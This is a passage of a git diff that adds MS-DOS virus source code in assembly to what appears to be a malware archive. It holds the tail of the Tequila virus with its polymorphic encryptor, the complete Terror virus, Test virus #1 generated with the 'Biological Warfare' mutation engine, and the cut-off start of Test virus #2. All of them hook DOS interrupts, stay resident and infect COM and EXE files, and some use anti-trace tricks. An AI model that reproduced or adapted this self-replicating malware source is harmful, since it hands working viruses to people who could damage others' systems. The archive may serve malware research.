CALL D[09B4] ;Masm Mod. Needed + PUSHF + PUSH AX + JB 0691 ;Masm Mod. Needed + ES MOV AL,B[BX+016] ;Masm Mod. Needed + AND AL,01F + CMP AL,01F + JNE 0691 ;Masm Mod. Needed + ES SUB W[BX+01A],09A4 ;Masm Mod. Needed + ES SBB W[BX+01C],0 ;Masm Mod. Needed + POP AX + POPF + POP ES + POP BX + RET + +WRITE_TO_THE_FILE: + MOV AH,040 + JMP 069C ;Masm Mod. Needed + +READ_FROM_THE_FILE: + MOV AH,03F + CALL 06B4 ;Masm Mod. Needed + JB RET ;Masm Mod. Needed + SUB AX,CX + RET + +MOVE_TO_END_OF_FILE: + XOR CX,CX + XOR DX,DX + MOV AX,04202 + JMP 06B4 ;Masm Mod. Needed + +MOVE_TO_BEGINNING_OF_FILE: + XOR CX,CX + XOR DX,DX + MOV AX,04200 + CS MOV BX,W[09A4] ;Masm Mod. Needed + +INT_21: + CLI + PUSHF + CS CALL D[09B4] ;Masm Mod. Needed + RET + +INFECT_THE_FILE: + PUSH AX + PUSH BX + PUSH CX + PUSH DX + PUSH SI + PUSH DI + PUSH ES + PUSH DS + CALL CHECK_LETTERS_IN_FILENAME + JAE GOOD_NAME + JMP BAD_NAME + +GOOD_NAME: + PUSH DX + PUSH DS + PUSH CS + POP DS + +SAVE_AND_REPLACE_CRITICAL_ERROR_HANDLER: + MOV AX,03524 + CALL INT_21 + MOV W[09B8],BX ;Masm Mod. Needed + MOV W[09BA],ES ;Masm Mod. Needed + MOV AX,02524 + MOV DX,052A + CALL INT_21 + POP DS + POP DX + +SAVE_AND_REPLACE_FILE_ATTRIBUTE: + MOV AX,04300 + CALL INT_21 + CS MOV W[09AA],CX ;Masm Mod. Needed + JAE 06FE ;Masm Mod. Needed + JMP RESTORE_CRIT_HANDLER + MOV AX,04301 + XOR CX,CX + CALL INT_21 + JB 077C ;Masm Mod. Needed + +OPEN_FILE_FOR_READ_WRITE: + MOV AX,03D02 + CALL INT_21 + JB 0771 ;Masm Mod. Needed + PUSH DX + PUSH DS + PUSH CS + POP DS + MOV W[09A4],AX ;Masm Mod. Needed + +GET_FILEDATE: + MOV AX,05700 + CALL 06B4 ;Masm Mod. Needed + JB 075C ;Masm Mod. Needed + MOV W[09AC],DX ;Masm Mod. Needed + MOV W[09AE],CX ;Masm Mod. Needed + +READ_AND_CHECK_EXE_HEADER: + CALL 06AD ;Masm Mod. Needed + MOV DX,0A49 + MOV CX,01C + CALL 069A ;Masm Mod. Needed + JB 075C ;Masm Mod. Needed + PUSH DS + POP ES + MOV DI,0E8 + MOV CX,020 + CMP W[0A49],05A4D ;Masm Mod. Needed + JNE 075C ;Masm Mod. Needed + MOV AX,W[0A5B] + CLD + REPNE SCASW + JNE 0754 ;Masm Mod. Needed + OR W[09AE],01F ;Masm Mod. Needed + JMP 075C ;Masm Mod. Needed + CALL READ_PAST_END_OF_FILE + JB 075C ;Masm Mod. Needed + CALL ENCRYPT_AND_WRITE_TO_FILE + +RESTORE_ALTERED_DATE: + MOV AX,05701 + MOV DX,W[09AC] + MOV CX,W[09AE] + CALL 06B4 ;Masm Mod. Needed + +CLOSE_THE_FILE: + MOV AH,03E + CALL 06B4 ;Masm Mod. Needed + +RESTORE_FILE_ATTRIBUTE: + POP DS + POP DX + MOV AX,04301 + CS MOV CX,W[09AA] ;Masm Mod. Needed + CALL INT_21 + +RESTORE_CRIT_HANDLER: + MOV AX,02524 + CS LDS DX,[09B8] ;Masm Mod. Needed + CALL INT_21 + +BAD_NAME: + POP DS + POP ES + POP DI + POP SI + POP DX + POP CX + POP BX + POP AX + RET + +CHECK_LETTERS_IN_FILENAME: + PUSH DS + POP ES + MOV DI,DX + MOV CX,-1 + XOR AL,AL + CLD + REPNE SCASB + NOT CX + MOV DI,DX + MOV AX,04353 + MOV SI,CX + SCASW + JE 07B7 ;Masm Mod. Needed + DEC DI + LOOP 07A5 ;Masm Mod. Needed + MOV CX,SI + MOV DI,DX + MOV AL,056 + REPNE SCASB + JE 07B7 ;Masm Mod. Needed + CLC + RET + STC + RET + +READ_PAST_END_OF_FILE: + MOV CX,-1 + MOV DX,-0A + CALL 06A8 ;Masm Mod. Needed + MOV DX,0A65 + MOV CX,8 + CALL 069A ;Masm Mod. Needed + JB RET ;Masm Mod. Needed + CMP W[0A65],0FDF0 ;Masm Mod. Needed + JNE 07F0 ;Masm Mod. Needed + CMP W[0A67],0AAC5 ;Masm Mod. Needed + JNE 07F0 ;Masm Mod. Needed + MOV CX,-1 + MOV DX,-9 + CALL 06A8 ;Masm Mod. Needed + MOV DX,0A6B + MOV CX,4 + CALL 0696 ;Masm Mod. Needed + RET + CLC + RET + +ENCRYPT_AND_WRITE_TO_FILE: + CALL MOVE_TO_END_OF_FILE + MOV SI,AX + MOV DI,DX + MOV BX,0A49 + MOV AX,W[BX+4] + MUL W[0D] ;Masm Mod. Needed + SUB AX,SI + SBB DX,DI + JAE 080C ;Masm Mod. Needed + JMP OUT_OF_ENCRYPT + MOV AX,W[BX+8] + MUL W[0B] ;Masm Mod. Needed + SUB SI,AX + SBB DI,DX + MOV AX,W[BX+0E] + MOV W[4],AX ;Masm Mod. Needed + ADD W[4],010 ;Masm Mod. Needed + MUL W[0B] ;Masm Mod. Needed + ADD AX,W[BX+010] + SUB AX,SI + SBB DX,DI + JB 083C ;Masm Mod. Needed + SUB AX,080 + SBB DX,0 + JB RET ;Masm Mod. Needed + ADD W[BX+0E],09B + MOV AX,W[BX+016] + ADD AX,010 + MOV W[2],AX ;Masm Mod. Needed + MOV AX,W[BX+014] + MOV W[0],AX ;Masm Mod. Needed + CALL 06A4 ;Masm Mod. Needed + ADD AX,09A4 + ADC DX,0 + DIV W[0D] ;Masm Mod. Needed + INC AX + MOV W[0A4D],AX ;Masm Mod. Needed + MOV W[0A4B],DX ;Masm Mod. Needed + MOV DX,DI + MOV AX,SI + DIV W[0B] ;Masm Mod. Needed + MOV W[0A5F],AX ;Masm Mod. Needed + MOV BX,DX + ADD DX,0960 + MOV W[0A5D],DX ;Masm Mod. Needed + CALL COPY_TO_HIGH_MEMORY_ENCRYPT_WRITE + JB RET ;Masm Mod. Needed + OR W[09AE],01F ;Masm Mod. Needed + MOV BX,W[09BC] + AND BX,01F + SHL BX,1 + MOV AX,W[BX+0E8] + MOV W[0A5B],AX ;Masm Mod. Needed + CALL MOVE_TO_BEGINNING_OF_FILE + MOV CX,01C + MOV DX,0A49 + +WRITE_THE_NEW_HEADER: + CALL 0696 ;Masm Mod. Needed + OUT_OF_ENCRYPT: + RET + +COPY_TO_HIGH_MEMORY_ENCRYPT_WRITE: + PUSH BP + XOR AH,AH + INT 01A + MOV AX,DX + MOV BP,DX + PUSH DS + POP ES + MOV DI,0960 + MOV SI,DI + MOV CX,020 + CLD + REP STOSW + XOR DX,DX + MOV ES,DX + CALL ENCRYPT_STEP_ONE + CALL ENCRYPT_STEP_TWO + CALL ENCRYPT_STEP_THREE + MOV B[SI],0E9 + MOV DI,028C + SUB DI,SI + SUB DI,3 + INC SI + MOV W[SI],DI + MOV AX,0A04 + CALL AX + POP BP + RET + +ENCRYPT_STEP_ONE: + DEC BP + ES TEST B[BP],2 ;Masm Mod. Needed + JNE 08EB ;Masm Mod. Needed + MOV B[SI],0E + INC SI + CALL GARBLER + MOV B[SI],01F + INC SI + CALL GARBLER + RET + MOV W[SI],0CB8C + INC SI + INC SI + CALL GARBLER + MOV W[SI],0DB8E + INC SI + INC SI + CALL GARBLER + RET + +ENCRYPT_STEP_TWO: + AND CH,0FE + DEC BP + ES TEST B[BP],2 ;Masm Mod. Needed + JE 0920 ;Masm Mod. Needed + OR CH,1 + MOV B[SI],0BE + INC SI + MOV W[SI],BX + INC SI + INC SI + CALL GARBLER + ADD BX,0960 + TEST CH,1 + JE 0934 ;Masm Mod. Needed + MOV B[SI],0BB + INC SI + MOV W[SI],BX + INC SI + INC SI + CALL GARBLER + ADD BX,0960 + TEST CH,1 + JE 090C ;Masm Mod. Needed + SUB BX,0960 + CALL GARBLER + MOV B[SI],0B9 + INC SI + MOV AX,0960 + MOV W[SI],AX + INC SI + INC SI + CALL GARBLER + CALL GARBLER + RET + +ENCRYPT_STEP_THREE: + MOV AH,014 + MOV DH,017 + TEST CH,1 + JE 0958 ;Masm Mod. Needed + XCHG DH,AH + MOV DI,SI + MOV AL,08A + MOV W[SI],AX + INC SI + INC SI + CALL GARBLER + XOR DL,DL + MOV B[0A39],028 ;Masm Mod. Needed + DEC BP + ES TEST B[BP],2 ;Masm Mod. Needed + JE 0978 ;Masm Mod. Needed + MOV DL,030 + MOV B[0A39],DL ;Masm Mod. Needed + MOV W[SI],DX + INC SI + INC SI + MOV W[SI],04346 + INC SI + INC SI + CALL GARBLER + MOV AX,0FE81 + MOV CL,0BE + TEST CH,1 + JE 0993 ;Masm Mod. Needed + MOV AH,0FB + MOV CL,0BB + MOV W[SI],AX + INC SI + INC SI + PUSH BX + ADD BX,040 + MOV W[SI],BX + INC SI + INC SI + POP BX + MOV B[SI],072 + INC SI + MOV DX,SI + INC SI + CALL GARBLER + MOV B[SI],CL + INC SI + MOV W[SI],BX + INC SI + INC SI + MOV AX,SI + SUB AX,DX + DEC AX + MOV BX,DX + MOV B[BX],AL + CALL GARBLER + CALL GARBLER + MOV B[SI],0E2 + INC SI + SUB DI,SI + DEC DI + MOV AX,DI + MOV B[SI],AL + INC SI + CALL GARBLER + RET + +GARBLER: + DEC BP + ES TEST B[BP],0F ;Masm Mod. Needed + JE RET ;Masm Mod. Needed + DEC BP + ES MOV AL,B[BP] ;Masm Mod. Needed + TEST AL,2 + JE 0A0E ;Masm Mod. Needed + TEST AL,4 + JE 09F7 ;Masm Mod. Needed + TEST AL,8 + JE 09F1 ;Masm Mod. Needed + MOV W[SI],0C789 + INC SI + INC SI + JMP RET ;Masm Mod. Needed + MOV B[SI],090 + INC SI + JMP RET ;Masm Mod. Needed + MOV AL,085 + DEC BP + ES MOV AH,B[BP] ;Masm Mod. Needed + TEST AH,2 + JE 0A05 ;Masm Mod. Needed + DEC AL + OR AH,0C0 + MOV W[SI],AX + INC SI + INC SI + JMP RET ;Masm Mod. Needed + DEC BP + ES TEST B[BP],2 ;Masm Mod. Needed + JE 0A1A ;Masm Mod. Needed + MOV AL,039 + JMP 09F9 ;Masm Mod. Needed + MOV B[SI],0FC + INC SI + RET + +MAKE_THE_DISK_WRITE: + CALL PERFORM_ENCRYPTION_DECRYPTION + MOV AH,040 + MOV BX,W[09A4] + MOV DX,0 + MOV CX,09A4 + PUSHF + CALL D[09B4] ;Masm Mod. Needed + JB 0A37 ;Masm Mod. Needed + SUB AX,CX + PUSHF + CMP B[0A39],028 ;Masm Mod. Needed + JNE 0A44 ;Masm Mod. Needed + MOV B[0A39],0 ;Masm Mod. Needed + CALL PERFORM_ENCRYPTION_DECRYPTION + POPF + RET + +PERFORM_ENCRYPTION_DECRYPTION: + MOV BX,0 + MOV SI,0960 + MOV CX,0960 + MOV DL,B[SI] + XOR B[BX],DL + INC SI + INC BX + CMP SI,09A0 + JB 0A61 ;Masm Mod. Needed + MOV SI,0960 + LOOP 0A52 ;Masm Mod. Needed + RET + +THE_FILE_DECRYPTING_ROUTINE: + PUSH CS + POP DS + MOV BX,4 + MOV SI,0964 + MOV CX,0960 + MOV DL,B[SI] + ADD B[BX],DL + INC SI + INC BX + CMP SI,09A4 + JB 0A7E ;Masm Mod. Needed + MOV SI,0964 + LOOP 0A6F ;Masm Mod. Needed + JMP 0390 ;Masm Mod. Needed + +;========== THE FOLLOWING IS NOT PART OF THE VIRUS ======== +;========== BUT IS MERELY THE BOOSTER. ======== + +START: + LEA W[0104],EXIT ;Masm Mod. Needed + MOV W[0106],CS ;Masm Mod. Needed + MOV BX,CS + SUB W[0106],BX ;Masm Mod. Needed + JMP INSTALL + +EXIT: + INT 020 + +TEQUILA ENDP +CODE_SEG ENDS +END TEQUILA \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.terror.asm b/MSDOS/Virus.MSDOS.Unknown.terror.asm new file mode 100644 index 00000000..2feafde5 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.terror.asm @@ -0,0 +1,492 @@ +;********************************************** +; Terror Virus +;********************************************** + +Code Segment + Assume CS:Code + Org 100h + +Start: jmp short Begin + +Table310 dw 12E4h,09ABh +Table320 dw 138Dh,17D0h +Table330 dw 1460h,0F7Ah + +FileBytes dw 12 dup (9090h) + +ComSpec db 'A:\COMMAND.COM',0 + +CheckEXE: cmp cs:FileBytes,4D5Ah + je IsEXE + cmp cs:FileBytes,5A4Dh +IsEXE: ret + +Begin: mov word ptr cs:PSPSeg,ds + push ax + mov ax,0EC59h + int 21h + cmp bp,ax + jnz Install + push cs + pop ds +StartFile: pop ax + mov es,word ptr cs:PSPSeg + call CheckEXE + je ExeFileStart + mov cx,13 + mov si,offset FileBytes + push es + mov di,100h + push di + rep movsb + push es + pop ds + retf +ExeFileStart: mov si,es + add si,10h + add cs:FileBytes [16h],si + add si,cs:FileBytes [0Eh] + mov di,cs:FileBytes [10h] + push es + pop ds + cli + mov ss,si + mov sp,di + sti + jmp dword ptr cs:FileBytes [14h] + +Install: mov ah,30h + int 21h + mov bx,offset Table310 + cmp ax,0A03h + jne Not310 + mov ax,0070h + mov bx,0D43h + mov es,ax + cmp byte ptr es:[bx],2Eh ; CS prefix + jne SetVectors + mov ax,bx + jmp short SetV1 +Not310: add bx,4 + cmp ax,1403h + je SetVectors + add bx,4 + cmp ax,1E03h + je SetVectors + mov ax,3513h + int 21h + mov word ptr cs:True13, bx + mov word ptr cs:True13 + 2,es + mov ax,3521h + mov dx,bx + jmp short Set21 +SetVectors: mov ax,word ptr cs:[bx+2] +SetV1: mov dx,word ptr cs:[bx] + mov word ptr cs:True13,ax + mov word ptr cs:True13 + 2,0070h + mov ah,34h + int 21h +Set21: push es + pop ds + mov ax,25ECh + int 21h + mov ax,word ptr cs:PSPSeg + mov es,ax + dec ax + mov ds,ax + mov bx,word ptr ds:[3] + sub bx,101 + add ax,bx + mov word ptr es:[0002h],ax ; Setup PSP memory size. + ; Command.COM needs that + ; action; else the system + ; hangs. + mov ah,4Ah + int 0ECh + mov bx,100 + mov ah,48h + int 0ECh + sub ax,10h + mov es,ax + mov byte ptr ds:[0000h],5Ah ; This is the last block, + ; don't you think so? + push cs + pop ds + mov si,100h + mov di,si + mov cx,MovedSize + rep movsb + mov di,offset Continue + push es + push di + retf + +Continue: mov word ptr es:[0F1h],0070h + mov ax,3521h + int 0ECh + mov word ptr cs:Saved21, bx + mov word ptr cs:Saved21 + 2,es + mov ah,25h + mov dx,offset Int21 + push cs + pop ds + int 0ECh + push cs + pop es + mov di,offset Handles + mov cx,25 + mov al,0 + rep stosb + jmp StartFile + +Respond: mov bp,ax + iret + +Int21: cmp ax,0EC59h + je Respond + cmp ax,4B00h + je Exec + cmp ah,3Dh + je Open + cmp ah,3Eh + je Close + cmp ah,11h + jne End21 + push di + mov di,dx + cmp byte ptr ds:[di+6],08 ; Volume ID attributes + je Find1st +EndF1st: pop di +End21: db 0EAh +Saved21 dd ? +Exec: call InfectName + jmp End21 +OpenEnd: pop cx + jmp End21 +Open: push cx + call GetAttr + jc OpenEnd + cmp cx,20h + pop cx + jne End21 + mov al,2 + pushf + call dword ptr cs:Saved21 + jc Err21 + push ax + push bx + mov bx,ax + mov al,byte ptr cs:Command? + mov byte ptr cs:Handles [bx],al + pop bx + pop ax +Err21: retf 2 +Close: cmp byte ptr cs:Handles [bx],0 + jz End21 + push ax + mov al,byte ptr cs:Handles [bx] + mov byte ptr cs:Command?,al + mov byte ptr cs:Handles [bx],0 + mov ah,45h + int 0ECh + mov word ptr cs:TempHandle,ax + pop ax + jc End21 + pushf + call dword ptr cs:Saved21 + jc Err21 + push bx + mov bx,word ptr cs:TempHandle + push ds + call SetV + call InfectHandle + call Restore + pop ds + pop bx + clc + retf 2 +Find1st: push ax + push dx + push ds + mov al,byte ptr ds:[di+7] + mov dx,offset Comspec + or al,al + jz CurrentDrive + add al,'A'-1 + mov byte ptr cs:Comspec,al + jmp short Infect1st +CurrentDrive: add dx,2 +Infect1st: push cs + pop ds + call InfectName + pop ds + pop dx + pop ax + jmp EndF1st + +InfectName: push ax + push bx + push cx + call GetAttr + jc EndIN0 + push cx + push ds + call SetV + pop ds + mov ax,4301h + xor cx,cx + int 0ECh + jc EndIN1 + mov ax,3D02h + int 0ECh + mov bx,ax +EndIN1: pop cx + jc EndInfName + call InfectHandle + mov ax,4301h + int 0ECh +EndInfName: call Restore +EndIN0: pop cx + pop bx + pop ax + ret + +SetV: push ax + push dx + push bx + push es + mov ax,3513h + int 0ECh + mov word ptr cs:Old13,bx + mov word ptr cs:Old13+2,es + mov al,24h + int 0ECh + mov word ptr cs:Old24,bx + mov word ptr cs:Old24+2,es + pop es + pop bx + push cs + pop ds + mov dx,offset Critical + mov ah,25h + int 0ECh + mov dx,offset Int13 + mov al,13h + int 0ECh + pop dx + pop ax + ret + +InfectHandle: push ax + push cx + push dx + push si + push di + push ds + mov di,offset FileBytes + mov cx,0FFFFh + mov dx,-6 + mov ax,4202h + int 0ECh + mov ah,3Fh + mov cx,6 + push cs + pop ds + mov dx,di + int 0ECh + jc EndH1 + cmp word ptr cs:[di],'eT' + je EndH1 + xor cx,cx + xor dx,dx + mov ax,4200h + int 0ECh + mov ah,3Fh + mov cx,24 + mov dx,di + int 0ECh + jnc ReadOk +EndH1: jmp EndInfHandle +ReadOk: xor cx,cx + xor dx,dx + cmp byte ptr cs:Command?,2 + jne Seek + cmp word ptr ds:[di+1],4000h ; Is there some + ; another virus + ; in the stack? + ja EndH1 + dec cx + mov dx,-(VirusSize+64) +Seek: mov ax,4202h +Seek1: int 0ECh + test ax,000Fh + jz SeekOk + mov cx,dx + mov dx,ax + add dx,10h + and dl,0F0h + mov ax,4200h + jmp Seek1 +SeekOk: call CheckEXE + je SkipEXE + or dx,dx + jnz EndH1 + cmp ax,1024 + jnb MayBeGood? + jmp EndInfHandle +MayBeGood?: cmp ax,64000 + ja EndInfHandle +SkipEXE: mov cl,4 + shr ax,cl + mov si,ax + mov cl,12 + shl dx,cl + add si,dx + mov ah,40h + mov dx,100h + mov cx,VirusSize + int 0ECh + jc EndInfHandle + call CheckEXE + jne ComFile + sub si,10h + sub si,word ptr cs:[di+08h] + mov word ptr cs:[di+14h],100h + mov word ptr cs:[di+16h],si + mov word ptr cs:[di+10h],400h + add si,VirusSize / 16 + 1 + mov word ptr cs:[di+0Eh],si + mov ax,4202h + xor cx,cx + xor dx,dx + int 0ECh + mov cx,200h + div cx + or dx,dx + jz DontAdjust + inc ax +DontAdjust: mov word ptr cs:[di+02h],dx + mov word ptr cs:[di+04h],ax + jmp short Common +ComFile: push si + push di + push es + push cs + pop es + mov si,offset ComHeader + mov cx,11 + rep movsb + pop es + pop di + pop ds:[di+11] +Common: mov ax,4200h + xor cx,cx + xor dx,dx + int 0ECh + mov ah,40h + mov cx,24 + mov dx,di + int 0ECh +EndInfHandle: mov ax,5700h + int 0ECh + mov al,1 + int 0ECh + mov ah,3Eh + int 0ECh + pop ds + pop di + pop si + pop dx + pop cx + pop ax + ret + +Restore: push ax + push dx + push ds + mov ax,2513h + mov dx,word ptr cs:Old13 + mov ds,word ptr cs:Old13+2 + int 0ECh + mov al,24h + mov dx,word ptr cs:Old24 + mov ds,word ptr cs:Old24+2 + pop ds + pop dx + pop ax + ret + +GetAttr: push ax + push es + push di + push bx + mov di,dx + push ds + pop es + mov al,0 + mov cx,64 + repne scasb + mov ax,word ptr ds:[di-3] + mov cx,word ptr ds:[di-5] + and ax,5F5Fh ; Upcase extension + and ch,5Fh + cmp ax,'MO' + jne Exe? + cmp cx,'C.' + je CommandChk +ErrAttr: stc + jmp short EndAttr +Exe?: cmp ax,'EX' + jne ErrAttr + cmp cx,'E.' + jne ErrAttr +CommandChk: mov cx,7 + mov bx,-1 +Loop0: inc bx + mov al,byte ptr ds:[bx+di-12] + and al,5Fh + cmp al,byte ptr cs:Comspec [bx+3] + loope Loop0 + mov al,1 + jne NoCommand + mov al,2 +NoCommand: mov byte ptr cs:Command?,al + mov ax,4300h + int 0ECh +EndAttr: pop bx + pop di + pop es + pop ax + ret + +Critical: mov al,3 + iret + +Int13: cmp ah,3 + jz Skip13 + db 0EAh ; JMP Far +Old13 dd ? +Skip13: db 0EAh +True13 dd ? + +ComHeader db 50h,8Ch,0C8h,01h,06h,0Bh,01h,58h,0EAh,00h,01h + +Terror db ' Terror' + +VirusEnd label byte + +VirusSize = offset VirusEnd - offset Start + +Old24 dd ? + +TempHandle label word +PSPSeg dw ? + +MovedSize = $ - offset Start + +Handles db 25 dup (?) + +Command? db ? + +Code EndS + End Start diff --git a/MSDOS/Virus.MSDOS.Unknown.test1.asm b/MSDOS/Virus.MSDOS.Unknown.test1.asm new file mode 100644 index 00000000..ea61555f --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.test1.asm @@ -0,0 +1,379 @@ +; test1.asm : Test virus #1 +; Created with Biological Warfare - Version 0.90 by MnemoniX + +PING equ 0F43Fh +PONG equ 0B1DEh +STAMP equ 26 +MARKER equ 07070h + +code segment + org 0 + assume cs:code,ds:code + +start: + db 0E9h,3,0 ; to virus +host: + db 0CDh,20h,0 ; host program +virus_begin: + push ds es + + call $ + 3 ; BP is instruction ptr. + pop bp + sub bp,offset $ - 1 + + xor ax,ax ; mild anti-trace code + mov es,ax ; kill interrupts 1 & 3 + mov di,6 + stosw + mov di,14 + stosw + + in al,21h ; lock out & reopen keyboard + xor al,2 + out 21h,al + xor al,2 + out 21h,al + + mov ax,PING ; test for residency + int 21h + cmp bx,PONG + je installed + + mov ax,es ; Get PSP + dec ax + mov ds,ax ; Get MCB + + sub word ptr ds:[3],((MEM_SIZE+1023) / 1024) * 64 + sub word ptr ds:[12h],((MEM_SIZE+1023) / 1024) * 64 + mov es,word ptr ds:[12h] + + push cs ; copy virus into memory + pop ds + xor di,di + mov si,bp + mov cx,(virus_end - start) / 2 + 1 + rep movsw + + xor ax,ax ; capture interrupts + mov ds,ax + + mov si,21h * 4 ; get original int 21 + mov di,offset old_int_21 + movsw + movsw + + mov word ptr ds:[si - 4],offset new_int_21 + mov ds:[si - 2],es ; and set new int 21 + +installed: + pop es ds ; restore segregs + cmp sp,MARKER ; check for .EXE + je exe_exit + +com_exit: + mov si,[bp + mutator] ; restore host program + sub si,3 + mov di,100h + push di + movsw + movsb + + call fix_regs ; fix up registers + ret ; and leave +exe_exit: + mov ax,ds ; fix up return address + add ax,10h + push ax + add ax,cs:[bp + exe_cs] + mov cs:[bp + return_cs],ax + + mov ax,cs:[bp + exe_ip] + mov cs:[bp + return_ip],ax + + pop ax + add ax,cs:[bp + exe_ss] ; restore stack + cli + mov ss,ax + mov sp,cs:[bp + exe_sp] + + call fix_regs ; fix up registers + sti + + db 0EAh ; back to host program +return_ip dw 0 +return_cs dw 0 + +exe_cs dw -16 ; orig CS:IP +exe_ip dw 103h +exe_sp dw -2 ; orig SS:SP +exe_ss dw -16 + +fix_regs: + xor ax,ax + cwd + xor bx,bx + mov si,100h + xor di,di + xor bp,bp + ret + +; interrupt 21 handler +int_21: + pushf + call dword ptr cs:[old_int_21] + ret + +new_int_21: + cmp ax,PING ; residency test + je ping_pong + cmp ah,3Dh ; file open + je file_open + cmp ax,4B00h ; execute program + je execute +int_21_exit: + db 0EAh ; never mind ... +old_int_21 dd 0 + +ping_pong: + mov bx,PONG + iret + +file_open: + push ax cx di es + call get_extension + cmp [di],'OC' ; .COM file? + jne perhaps_exe ; perhaps .EXE then + cmp byte ptr [di + 2],'M' + jne not_prog + jmp a_program +perhaps_exe: + cmp [di],'XE' ; .EXE file? + jne not_prog + cmp byte ptr [di + 2],'E' + jne not_prog +a_program: + pop es di cx ax + jmp execute ; infect file +not_prog: + pop es di cx ax + jmp int_21_exit + +execute: + push ax bx cx dx si di ds es + + xor ax,ax ; critical error handler + mov es,ax ; routine - catch int 24 + mov es:[24h * 4],offset int_24 + mov es:[24h * 4 + 2],cs + + mov ax,4300h ; change attributes + int 21h + + push cx dx ds + xor cx,cx + call set_attributes + + mov ax,3D02h ; open file + call int_21 + jnc open_it + jmp cant_open +open_it: + xchg bx,ax + + push cs ; CS = DS + pop ds + + mov ax,5700h ; save file date/time + int 21h + push cx dx + and cl,31 ; check time stamp + cmp cl,STAMP + jnz its_ok + jmp dont_infect +its_ok: + mov ah,3Fh + mov cx,28 + mov dx,offset read_buffer + int 21h + + cmp word ptr read_buffer,'ZM' ; .EXE? + jne its_ok_2 + jmp infect_exe +its_ok_2: + mov al,2 ; move to end of file + call move_file_ptr + + cmp dx,65279 - (VIRUS_SIZE + 3) + ja dont_infect ; too big, don't infect + + mov word ptr new_jump + 1,dx + + add dx,103h + mov mutator,dx + push cs ; call Biological Warfare + pop es ; Mutation Engine + mov cx,VIRUS_SIZE + mov di,offset encrypt_buffer + mov si,offset virus_begin + + call _bwme + + push cx + mov cx,3 + mov ah,40h + mov dx,offset read_buffer ; save original program head + int 21h + + mov ah,40h ; write virus to file + pop cx + mov dx,offset encrypt_buffer + int 21h + + xor al,al ; back to beginning of file + call move_file_ptr + + mov dx,offset new_jump ; and write new jump + int 21h + +fix_date_time: + pop dx cx + and cl,-32 ; add time stamp + or cl,STAMP + mov ax,5701h ; restore file date/time + int 21h + +close: + pop ds dx cx ; restore attributes + call set_attributes + + mov ah,3Eh ; close file + int 21h + +cant_open: + pop es ds di si dx cx bx ax + jmp int_21_exit ; leave + + +set_attributes: + mov ax,4301h + int 21h + ret + +dont_infect: + pop cx dx ; can't infect, skip + jmp close + +move_file_ptr: + mov ah,42h ; move file pointer + cwd + xor cx,cx + int 21h + + mov dx,ax ; set up registers + mov ah,40h + mov cx,3 + ret +infect_exe: + cmp word ptr read_buffer[26],0 + jne dont_infect ; overlay, don't infect + + cmp word ptr read_buffer[16],MARKER + je dont_infect ; infected already + + les ax,dword ptr read_buffer[20] + mov exe_cs,es ; CS + mov exe_ip,ax ; IP + + les ax,dword ptr read_buffer[14] + mov exe_ss,ax ; SS + mov exe_sp,es ; SP + mov word ptr read_buffer[16],MARKER + + mov ax,4202h ; to end of file + cwd + xor cx,cx + int 21h + + push ax dx ; save file size + + push bx + mov cl,12 ; calculate offsets for CS + shl dx,cl ; and IP + mov bx,ax + mov cl,4 + shr bx,cl + add dx,bx + and ax,15 + pop bx + + sub dx,word ptr read_buffer[8] + mov word ptr read_buffer[22],dx + mov word ptr read_buffer[20],ax + add dx,100 + mov word ptr read_buffer[14],dx + + pop dx ax ; calculate prog size + + add ax,VIRUS_SIZE + 3 + adc dx,0 + mov cx,512 ; in pages + div cx ; then save results + inc ax + mov word ptr read_buffer[2],dx + mov word ptr read_buffer[4],ax + mov dx,word ptr read_buffer[20] + mov cx,VIRUS_SIZE ; call BWME + mov di,offset encrypt_buffer + mov si,offset virus_begin + push cs + pop es + + call _bwme + + + mov ah,40h + mov dx,offset encrypt_buffer + int 21h + + + mov ax,4200h ; back to beginning + cwd + xor cx,cx + int 21h + + mov ah,40h ; and fix up header + mov cx,28 + mov dx,offset read_buffer + int 21h + jmp fix_date_time ; done + +courtesy_of db '[BW]',0 +signature db 'Test virus #1',0 + +get_extension: + push ds ; find extension + pop es + mov di,dx + mov cx,64 + mov al,'.' + repnz scasb + ret + include bwme.asm + +int_24: + mov al,3 ; int 24 handler + iret +mutator dw 106h +new_jump db 0E9h,0,0 + +virus_end: +VIRUS_SIZE equ virus_end - virus_begin +read_buffer db 28 dup (?) ; read buffer +encrypt_buffer db VIRUS_SIZE dup (?) ; encryption buffer + +end_heap: + +MEM_SIZE equ end_heap - start + +code ends + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.test2.asm b/MSDOS/Virus.MSDOS.Unknown.test2.asm new file mode 100644 index 00000000..37a10ecc --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.test2.asm @@ -0,0 +1,303 @@ +; test2.asm : Test virus #2 +; Created with Biological Warfare - Version 0.90 by MnemoniX + +PING equ 0A6CFh +INFECT equ 2 +MARKER equ 08080h + +code segment + org 100h + assume cs:code,ds:code + +start: + db 0E9h,3,0 ; to virus +host: + db 0CDh,20h,0 ; host program +virus_begin: + push ds es + + call $ + 3 ; BP is instruction ptr. + pop bp + sub bp,offset $ - 1 + + xor ax,ax ; mild anti-trace code + mov es,ax ; kill interrupts 1 & 3 + mov di,6 + stosw + mov di,14 + stosw + + in al,21h ; lock out & reopen keyboard + xor al,2 + out 21h,al + xor al,2 + out 21h,al + + push cs + pop ds + lea dx,[bp + offset new_DTA] + mov ah,1Ah + int 21h + + mov byte ptr [bp + infections],0 + + push [bp + exe_cs] + push [bp + exe_ip] + push [bp + exe_ss] + push [bp + exe_sp] + call traverse + + call activate + + pop [bp + exe_sp] + pop [bp + exe_ss] + pop [bp + exe_ip] + pop [bp + exe_cs] + pop es ds + mov dx,80h + mov ah,1Ah + int 21h + +exe_exit: + mov ax,ds ; fix up return address + add ax,10h + push ax + add ax,cs:[bp + exe_cs] + mov cs:[bp + return_cs],ax + + mov ax,cs:[bp + exe_ip] + mov cs:[bp + return_ip],ax + + pop ax + add ax,cs:[bp + exe_ss] ; restore stack + cli + mov ss,ax + mov sp,cs:[bp + exe_sp] + + call fix_regs ; fix up registers + sti + + db 0EAh ; back to host program +return_ip dw 0 +return_cs dw 0 + +exe_cs dw -16 ; orig CS:IP +exe_ip dw 103h +exe_sp dw -2 ; orig SS:SP +exe_ss dw -16 + +fix_regs: + xor ax,ax + cwd + xor bx,bx + mov si,100h + xor di,di + xor bp,bp + ret + + +traverse: + sub sp,64 ; allocate stack space + mov si,sp + inc si + mov 